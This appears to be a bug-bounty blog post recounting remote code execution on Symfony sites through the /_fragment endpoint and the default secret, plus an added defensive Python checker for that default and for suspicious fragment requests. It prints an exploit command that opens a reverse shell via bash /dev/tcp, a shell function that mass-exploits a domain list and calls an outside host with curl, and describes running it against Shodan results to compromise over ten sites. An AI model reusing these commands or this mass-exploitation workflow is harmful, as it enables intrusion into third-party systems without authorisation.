How I got RCE in + 10 websites…

crd0x49
4 min read · Apr 13, 2023


Hello hackers, how is everyone?

Many may say that the title of this article is a strategy to attract readers, but that is not the objective. The goal here is to share the knowledge and the success I have had with this exploitation.

Note: only test sites that you have permission to test.

One day I was looking at some articles here and came across one titled “How I hacked 28 sites at once [RCE]”. As I was already studying this type of attack, it caught my attention.

I encourage everyone to read that article because it is very complete. In fact, my thanks go to Al1z4deh:~# echo “Welcome” for sharing the knowledge. Thanks! Follow his Medium.

When I saw that it was Symfony, I immediately remembered that I had already seen this in some recon in the past. I went looking for the host, which I will refer to as example.com, and it was still exposed. So I decided to request the path /_fragment detailed in the article mentioned above, and the page was different because debug mode was active.

Even though it was different, I continued the exploitation using the script below. As usual, I read the code to understand what was happening and how to exploit this vulnerability.

When executing the line of code below, I noticed that the site returned an error about a possible overflow, and the output file was not being saved as expected. I believe this was a bug in the application under test itself.

After the error I decided to simply remove the out.txt output, expecting that the command result would then be returned directly on screen, and that is exactly what happened!

After that I decided to check whether I could get a reverse shell, that is, whether there was any control blocking outbound connections to the internet. To my surprise, there was none.

python3 secret_fragment_exploit.py 'https://m4cddr.com/app_dev.php/_fragment' --method 1 --secret 'ThisTokenIsNotSoSecretChangeIt' --algo 'sha256' --internal-url 'https://m4cddr.com/app_dev.php/_fragment' --function shell_exec --parameters cmd:'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'

That was the result.

How to automate this?

I quickly added a function to my script that receives a few values and exploits this vulnerability automatically.

RCESymfony(){
    for i in $(cat domains); do
        python3 secret_fragment_exploit.py "$i"/_fragment --method 1 --secret 'ThisTokenIsNotSoSecretChangeIt' --algo 'sha256' --internal-url "$i"/_fragment --function shell_exec --parameters cmd:" curl https://$3" | anew -q RCEsymfony.tmp
    done
    for i in $(cat RCEsymfony.tmp); do
        curl "$i" | anew -q "RCEsymfony-$i.txt"
    done
}

The third argument is the DNS server of your choice.

This was the way I found to automate it; obviously there are other ways to accomplish this process. That is up to everyone’s creativity.
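As an added defender-side example (not code from this article or from the exploit script it uses), the checks below look for the two conditions this write-up depends on: a Symfony secret left at the default “ThisTokenIsNotSoSecretChangeIt”, and signed /_fragment requests arriving from clients other than the trusted reverse proxy. The trusted IP list, the combined log format and the sample log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Default secret shipped with older Symfony skeletons; the write-up's forged signatures rely on it.
DEFAULT_SECRET = "ThisTokenIsNotSoSecretChangeIt"

# "APP_SECRET=..." in a .env file, or "secret: ..." in an older parameters.yml.
SECRET_LINE = re.compile(r"^\s*(?:APP_SECRET\s*=|secret\s*:)\s*(?P<val>.+?)\s*$")

# Combined-format access log line: client IP, request line, status code (assumed format).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def uses_default_secret(config_text):
    """True if the first secret key found still holds the well-known default value."""
    for line in config_text.splitlines():
        m = SECRET_LINE.match(line)
        if m:
            return m["val"].strip("\"'") == DEFAULT_SECRET
    return False

def flag_fragment_requests(log_lines, trusted_ips=("127.0.0.1", "::1")):
    """(ip, path, status) for signed /_fragment requests from clients other than the proxy.

    Fragment sub-requests normally come from the caching reverse proxy, so a _hash
    arriving from an arbitrary internet client is worth an alert."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path.endswith("/_fragment") and "_hash" in parse_qs(url.query):
            if m["ip"] not in trusted_ips:
                hits.append((m["ip"], url.path, int(m["status"])))
    return hits

# Constructed sample log lines (not from the article); 203.0.113.0/24 is documentation space.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Apr/2023:10:00:01 +0000] "GET /app_dev.php/_fragment?_path=x&_hash=abc HTTP/1.1" 200 512',
    '127.0.0.1 - - [13/Apr/2023:10:00:02 +0000] "GET /_fragment?_path=x&_hash=def HTTP/1.1" 200 128',
    '203.0.113.9 - - [13/Apr/2023:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    print("default secret:", uses_default_secret("APP_SECRET=ThisTokenIsNotSoSecretChangeIt\n"))
    for hit in flag_fragment_requests(SAMPLE_LOG):
        print("suspicious fragment request:", hit)
```

A hit whose path also contains the dev front controller (app_dev.php) is doubly worth attention, since that controller should not be reachable in production at all.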

I also created a Nuclei template to do this for me, but it is private; I leave it as homework and as an incentive for you to create your own template.

After this automation, I went to Shodan to identify applications running this framework, and, as expected, many appeared. I downloaded this information and ran my automation, through which I managed to exploit more than 10 applications with this vulnerability.

Notes:

  • Never doubt your intuition. Sometimes you just need time, and thinking outside the box, to get results that even you would not expect.

Thanks for reading this article. Share it if possible!

Again, I would like to thank Al1z4deh:~# echo “Welcome”, who helped me in this exploitation through his article. Thanks so much, bro!

Follow me!
Twitter: https://twitter.com/m4cddr
